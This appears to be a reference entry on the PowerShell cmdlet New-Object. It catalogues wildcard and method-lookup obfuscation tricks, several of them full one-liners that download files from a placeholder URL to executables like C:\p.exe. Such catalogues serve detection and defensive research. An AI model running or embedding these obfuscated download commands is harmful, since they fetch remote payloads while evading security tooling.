New-Object
Creates .NET or COM objects. Used to instantiate WebClient for downloads, create COM shells, or access Windows APIs.
Binary Paths
PowerShell cmdlet
Glob Patterns
| Pattern | Wildcards | Notes |
|---|---|---|
& (gcm N*-Obj*) System.Net.WebClient
|
* | Wildcards on both verb and noun |
& (gcm New-Ob*) System.Net.WebClient
|
* | Star matches 'ject' |
& (gcm N?w-Object) System.Net.WebClient
|
? | Single char wildcard replaces 'e' |
& (gcm N[d-f]w-Object) System.Net.WebClient
|
[d-f] | Character range matches 'e' in New |
(& (gcm N*-Obj*) Net.WebClient).DownloadFile('http://...','C:\p.exe')
|
* | Full download one-liner with glob-resolved cmdlet |
& (gcm *Object) Net.WebClient
|
* | Prefix wildcard |
(& (gcm N*-Obj*) -ComObject MsXml2.ServerXmlHttp).Open('GET','http://...',$false)
|
* | gcm glob on New-Object; -ComObject instantiates MsXml2.ServerXmlHttp COM object |
(& (gcm N?w-Ob*) -ComObject MsXml2.ServerXmlHttp).Open('GET','http://...',$false)
|
? * | Mixed ? and * wildcards on New-Object with -ComObject |
$w=New-Object Net.WebClient;$w.(($w.PsObject.Methods|?{$_.Name-clike'D*g'}).Name).Invoke('http://...')
|
-clike | -clike 'D*g' resolves DownloadString method on Net.WebClient via PSObject.Methods |
$w=New-Object Net.WebClient;$w.(($w.PsObject.Methods|?{$_.Name-clike'D*F*'}).Name).Invoke('http://...','C:\out.exe')
|
-clike | -clike 'D*F*' resolves DownloadFile method |